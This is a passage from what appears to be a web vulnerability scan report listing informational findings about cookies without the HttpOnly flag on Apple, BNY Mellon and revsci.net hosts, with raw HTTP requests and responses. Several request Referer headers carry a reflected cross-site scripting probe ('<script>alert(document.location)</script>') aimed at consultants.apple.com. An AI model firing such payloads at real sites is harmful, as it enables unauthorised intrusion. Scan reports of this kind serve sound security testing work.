s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 28 Apr 2011 22:13:30 GMT
If-None-Match: "243c-4a201ddff3680"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 22:13:30 GMT
ETag: "243c-4a201ddff3680"
Cache-Control: max-age=398
Expires: Tue, 19 Jul 2011 18:57:18 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=xLxcwxCeTU+HYfHdmg/XQ8YHOoiJO9noVqYg78e8+UwdNUwRLNGUneo/H/zqR6hX6hwuFlGm33hlyD+iHOcu2Nz05YIPyfnvB7M7c+5fPVLYhQdWWcR9Vx9fVRfrc5gt7rzuGzLi8pq+ksSNXMMYXeztRsf5amVS0qX/jE9IqXzFeyUzRF5QNcIFGUpQYa4c8+MMVeVWYo4wLZP+6fr4/mKawRV5fhRfA16jKNYam9mElYTBhrtroIu+IP9hM2zUmpjHPFZwQv7j/hs+F+B8paUkojp3Qle7GfRR8YNkZJ3MoYnxIb5yJLXQn9EZxYG6PB3v5k55MOj3vyPQeMWEr2EYhIgHSgTFSxSKp30GRFQYQ1Xal8nUiCv/kLGbCEz6Rmh4rTkVYAUvVmFc0l4fiUEWPgByZjpkVvevgCKRSi3mA+v14EJ6g8fw5nxnUsEaivwDP0a5V/StziMyyqofL7v4N+VFH/VfQasfZ04ORMFy40xFvWNSDWmObK+KZOFDgy4tcRNpIlxvdwe0F4BBHaa/wNVIDWdQKtGjCEeFPQuE7i5E2HlkgivW1oGtcdWT; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.72. http://images.apple.com/macpro/scripts/pagenav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /macpro/scripts/pagenav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/pagenav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sun, 13 Jan 2008 02:48:33 GMT
If-None-Match: "7ca-4439198664240"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 13 Jan 2008 02:48:33 GMT
ETag: "7ca-4439198664240"
Cache-Control: max-age=362
Expires: Tue, 19 Jul 2011 18:56:42 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=ZHzTaP/phyT7ZztWPfF5YV5rnLeKreE+BudU5VhJnvfzQE8c76KGu5bYP2Jzb5XcPvR/RMzLRmQ5vbPj28VAYRnqDE3wGY9bhnVVrx+x7BRNhOYCye0Q/zuhgPrHaJxpN93Aehy4J54iy2k6AGj85umsg42TuAZ8IM0dASMUW6L3nymXapXlPmi9fO7CsBm3tuoQFaO5QxnFQ8v7rYtrI2X0RWi2L7JSVaEEcf17F98FUrdpo35pmpAJNA9vNteKaT+fqJpnmhwsPxwRjmJW+9fx5oU6d2BipKOTqedPxNZ1yM5XchWp/bDANVriSqcdjdMmn4cZ5KfY0n/7UUQ3yHsNBxEAudwcCY0zkX1yl+F56vNE78bLS/l6ffsqlEADXYVG4dYfvWaYqT90FPcrQbIaZVZTG+nrj6rnAcxbkyzIy0RGpslI7/qF77mmUd8g6aQ/dqf60BZbFAJrQwTahUZDJcf7IFyI5SiDn8Y/MGBKwK2Tksrb1kC073U8KfGOsjUQtAP7mPjp/L+NoCYoC4MLbDi+AE7LaFApk3Z8zu6U7az+j+Bdv62J564xGR99; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.73. http://images.apple.com/macpro/scripts/performance.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /macpro/scripts/performance.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/performance.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 18 Nov 2010 00:36:10 GMT
If-None-Match: "1155-49548f9ebb280"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 18 Nov 2010 00:36:10 GMT
ETag: "1155-49548f9ebb280"
Cache-Control: max-age=111
Expires: Tue, 19 Jul 2011 18:52:31 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=huWud6MKM7fGr0sLtRFuzkknrgsqAUkTp5IgBXkjCJaXl1aBa2/a1BTGEGc6O2eGT1eLV6q4Dy5MBqDybpe/t+hzl8OwCOE533KhHnYrArt9HgSVUjzpYV8BY2XC/2FgpB5CiaviiqCklljw6gCQppgmf301SbQsao3jTu8JT28V5D++bg4X/u7IqczRA+pCv/AEKmcJV9srYhH/qlNZ7tBqNPtTMu1U4xT08moPm4Y4Ch/OYdqCwrk81oJzey2qnZdg6xTi8vobg+YNRJX9aNVT3l/iQfBmQR8nrLQCxIfls1E30U4qkqvqndWd6WsgqCEpREkk+78aS/kgGNXYWlKuHD/1zX7CxFAIQSOcb9AQDJV4rZoYSi8v3O2dsqVYzRKsE8Ai4wLbk8hpZV+dbBtMzaSUTxBSc2yw69wZ2Ipmon6WGQhryD0tKpL7OtTNgqYdcbQ3laI4KTk4JXZ9o38DMubgklNazzhfx8w2ERFgv9vPYx2+BrY5ltemg5F8DAZcU43GXtzMHdW+dsyRXnabk9Lu6RdwhM+HaUARBVzZ9te0DlM9fMQ6i8/OIGSj; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.74. http://internetdc.bnymellon.com/dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://internetdc.bnymellon.com
Path:   /dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif?&dcsdat=1311090569906&dcssip=www.bnymellon.com&dcsuri=/index.html&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=BNY%20Mellon%20|%20Asset%20Management%20and%20Securities%20Servicing&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=www.bnymellon.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1311090569909&WT.vtid=173.193.214.243-1841440192.30164523&WT.co_f=173.193.214.243-1841440192.30164523 HTTP/1.1
Host: internetdc.bnymellon.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090569909:ss=1311090569909

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:37a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xODQxNDQwMTkyLjMwMTY0NTIzAAAAAAABAAAABQAAAIKnJU6CpyVOAQAAAAEAAACCpyVOgqclTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 15:49:22 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 19 Jul 2011 15:49:22 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.75. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=C07583&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; 